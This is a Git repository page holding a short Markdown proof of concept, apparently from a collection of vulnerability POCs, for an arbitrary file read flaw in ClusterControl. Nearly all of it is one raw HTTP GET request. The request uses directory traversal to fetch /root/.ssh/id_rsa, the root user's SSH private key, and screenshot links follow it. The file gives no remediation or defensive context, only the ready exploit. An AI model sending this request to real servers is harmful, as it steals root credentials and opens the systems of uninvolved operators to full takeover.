admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/ClusterControl存在任意文件读取漏洞.md
wy876 f228c4e964 8.1更新漏洞
2024-08-01 20:05:27 +08:00

16 lines
385 B
Markdown
Raw Blame History

# ClusterControl存在任意文件读取漏洞
## poc
```yaml
GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
Host:
Accept-Encoding: identity
User-Agent: python-urllib3/1.26.4
```
![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011932688.png)
![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011932059.png)
Reference in New Issue View Git Blame Copy Permalink